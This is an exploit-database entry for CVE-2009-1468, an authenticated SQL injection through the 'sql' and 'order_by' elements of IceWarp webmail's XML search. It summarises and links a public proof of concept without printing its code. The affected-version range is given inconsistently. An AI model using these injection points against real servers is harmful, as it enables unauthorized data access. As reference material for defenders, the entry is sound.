CVE-2009-1468

IceWarp eMail Server < 9.3.0 - Authenticated SQL Injection via XML Search Query

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2009-1468. PoCs published by RedTeam Pentesting.

AI-analyzed exploit summary This exploit demonstrates SQL injection in IceWarp Merak Mail Server by crafting a malicious XML payload sent via a POST request. The script allows an attacker to inject arbitrary SQL queries into the 'order_by' and 'sql' parameters, potentially leading to unauthorized data access or manipulation.

Description

Multiple SQL injection vulnerabilities in the search form in server/webmail.php in the Groupware component in IceWarp eMail Server and WebMail Server before 9.4.2 allow remote authenticated users to execute arbitrary SQL commands via the (1) sql and (2) order_by elements in an XML search query.

Exploits (1)

exploitdb WORKING POC VERIFIED

by RedTeam Pentesting · bashwebappsphp

https://www.exploit-db.com/exploits/32968

View Code ZIP pw:eip

This exploit demonstrates SQL injection in IceWarp Merak Mail Server by crafting a malicious XML payload sent via a POST request. The script allows an attacker to inject arbitrary SQL queries into the 'order_by' and 'sql' parameters, potentially leading to unauthorized data access or manipulation.

Classification

Working Poc 90%

Attack Type

Sqli

Complexity

Moderate

Reliability

Reliable

Target: IceWarp Merak Mail Server 9.4.1

Auth required

Prerequisites: Valid session ID (sid) · Valid user ID (uid) · Access to the target webmail endpoint

MITRE ATT&CK

T1189 - Drive-by Compromise T1505 - Server Software Component

devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (6)

Core 6

Core References

Exploit vdb-entry x_refsource_bid

http://www.securityfocus.com/bid/34820

Third Party Advisory, VDB Entry vdb-entry x_refsource_sectrack

http://www.securitytracker.com/id?1022169

Third Party Advisory vdb-entry x_refsource_vupen

http://www.vupen.com/english/advisories/2009/1253

Third Party Advisory, VDB Entry vdb-entry x_refsource_osvdb

http://osvdb.org/54228

Exploit x_refsource_misc

http://www.redteam-pentesting.de/advisories/rt-sa-2009-003

Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq

http://www.securityfocus.com/archive/1/503226/100/0/threaded

Scores

EPSS 0.0192

EPSS Percentile 77.3%

Details

CWE

CWE-89

Status published

Products (50)

icewarp/email_server 2.10.105

icewarp/email_server 2.10.110

icewarp/email_server 2.10.115

icewarp/email_server 2.10.140

icewarp/email_server 2.10.150

icewarp/email_server 2.10.165

icewarp/email_server 2.10.170

icewarp/email_server 2.10.190

icewarp/email_server 2.10.200

icewarp/email_server 2.10.210

... and 40 more

Published May 05, 2009

Tracked Since Feb 18, 2026